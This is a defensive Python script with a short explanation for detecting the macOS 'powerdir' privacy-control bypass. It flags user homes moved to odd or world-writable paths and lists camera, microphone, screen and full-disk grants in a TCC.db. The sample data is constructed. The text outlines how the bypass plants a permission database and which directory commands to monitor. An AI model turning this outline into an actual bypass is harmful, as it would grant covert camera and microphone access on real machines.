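"""Two responder checks for the 'powerdir' precondition (added example, not Microsoft's PoC).

Check 1: parse `dscl . -list /Users NFSHomeDirectory` output and flag accounts whose home
(and therefore whose ~/Library/Application Support/com.apple.TCC/TCC.db) sits somewhere odd.
Check 2: read a TCC.db and list which clients it grants sensitive services.
The sample dscl output and the SQLite database here are constructed; the real access
table has more columns, and auth_value 2 is taken to mean 'allowed'.
"""
import sqlite3

USER_TCC_DB = "Library/Application Support/com.apple.TCC/TCC.db"
EXPECTED_HOME_ROOTS = ("/Users/", "/var/", "/private/var/")      # assumed-normal roots
SCRATCH_ROOTS = ("/tmp", "/private/tmp", "/var/tmp", "/private/var/tmp",
                 "/var/folders", "/private/var/folders")          # writable by anyone
SENSITIVE_SERVICES = {"kTCCServiceMicrophone", "kTCCServiceCamera",
                      "kTCCServiceScreenCapture", "kTCCServiceSystemPolicyAllFiles"}


def parse_dscl_homes(output: str):
    """Parse 'username  /home/path' lines into {username: home}."""
    homes = {}
    for line in output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            homes[parts[0]] = parts[1].strip()
    return homes


def odd_home_dirs(homes):
    """Users whose home is outside the usual roots; value is the TCC.db path TCC would load."""
    odd = {}
    for user, home in homes.items():
        if not home.startswith(EXPECTED_HOME_ROOTS) or home.startswith(SCRATCH_ROOTS):
            odd[user] = f"{home}/{USER_TCC_DB}"
    return odd


def granted_sensitive(con: sqlite3.Connection):
    """(service, client) pairs a TCC.db grants for camera, microphone, screen or full-disk access."""
    rows = con.execute("SELECT service, client FROM access WHERE auth_value = 2").fetchall()
    return sorted((s, c) for s, c in rows if s in SENSITIVE_SERVICES)


def make_sample_tcc_db() -> sqlite3.Connection:
    """Constructed stand-in for a planted TCC.db (simplified schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
                "auth_value INTEGER, auth_reason INTEGER)")
    con.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?)", [
        ("kTCCServiceMicrophone", "com.example.notes", 0, 2, 2),   # planted grant
        ("kTCCServiceCamera", "com.example.notes", 0, 2, 2),       # planted grant
        ("kTCCServiceCalendar", "com.apple.iCal", 0, 2, 2),        # not in the sensitive set
        ("kTCCServiceMicrophone", "com.example.denied", 0, 0, 3),  # denied, must not appear
    ])
    con.commit()
    return con


# Constructed sample in the shape of `dscl . -list /Users NFSHomeDirectory` output.
SAMPLE_DSCL = """\
_mbsetupuser  /var/setup
root          /var/root
alice         /Users/alice
bob           /private/tmp/fakehome
"""

if __name__ == "__main__":
    print(odd_home_dirs(parse_dscl_homes(SAMPLE_DSCL)))
    print(granted_sensitive(make_sample_tcc_db()))
```

On a real system you would feed the first check the live dscl output and point the second at the database path it reports; a home directory under /private/tmp whose TCC.db grants camera and microphone to an unfamiliar bundle identifier is exactly the artefact the technique leaves behind. Monitoring for dscl, dsexport and dsimport invocations that touch NFSHomeDirectory gives the same signal earlier.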